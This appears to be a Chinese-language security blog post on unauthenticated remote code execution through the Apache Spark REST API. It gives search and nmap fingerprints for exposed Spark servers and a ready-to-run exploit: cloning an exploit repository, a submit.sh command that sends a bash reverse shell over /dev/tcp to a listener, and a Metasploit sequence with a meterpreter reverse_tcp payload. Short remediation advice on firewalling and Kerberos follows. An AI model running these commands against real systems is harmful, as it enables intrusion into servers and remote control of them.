spark未授权访问导致rce
Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎,是UC Berkeley AMP lab(加州大学伯克利分校的AMP实验室)所开源的类Hadoop MapReduce的通用并行框架。为了让使用者能够方便的控制系统进行计算和查看任务结果,Spark也提供了 WEB UI图形化界面和相应的 REST API来方便用户操作。
特征
- header=” Jetty(9.3.z-SNAPSHOT) ”
搜索时需要对括号进行转义
server="Jetty\(9.3.z-SNAPSHOT\)" -
port=8080, etc
12345nmap扫描出如下端口之一开放, 则可能是spark6066/tcp open http Jetty 9.3.z-SNAPSHOT8081/tcp open http Jetty 9.3.z-SNAPSHOT8082/tcp open http Jetty 9.3.z-SNAPSHOT
利用
- exp (基于Linux)
下载地址:
git clone https://github.com/aRe00t/rce-over-spark.git
|
1 2 3 4 5 |
./submit.sh [target_ip]:6066 [version] https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/[listener_ip]/8888 0>&1" 举例子如下: ./submit.sh 192.168.100.2:6066 2.3.1 https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/192.168.100.1/8888 0>&1" |
- msf
|
1 2 3 4 5 6 7 8 9 10 |
msf5>use exploit/linux/http/spark_unauth_rce msf5>set payload java/meterpreter/reverse_tcp msf5>set rhost 192.168.100.2 msf5>set rport 6066 msf5>set lhost 192.168.100.1 msf5>set lport 4444 msf5>set srvhost 192.168.100.1 msf5>set srvport 8080 msf5>exploit |
- 自己改写的
poc
修复
- 配置
iptables或者 安全组配置访问策略,限制只能内网访问 8080、8081、7707、6606等端口 - 建议使用Spark的yarn控制模式,并且开启HTTP Kerberos对WEB UI进行访问控制;如采用Spark standalone模式,需要自行实现访问控制的jar包,并设置spark.ui.filters对WEB UI进行访问控制,
(见:http://spark.apache.org/docs/latest/configuration.html#security)
参考资料
- Spark on YARN 的两种模式
-
https://github.com/aRe00t/rce-over-spark/blob/master/submit.sh
- 威胁快报| 首个Spark REST API未授权漏洞利用分析
- https://baike.baidu.com/item/Kerberos
- Kerberos协议实现访问控制
附录
Kerberos协议
Kerberos协议主要用于网络身份鉴别,该协议的特点是只要输入一次身份验证信息就可以访问多个服务,而且访问更加安全。其基本原理图如下所示:
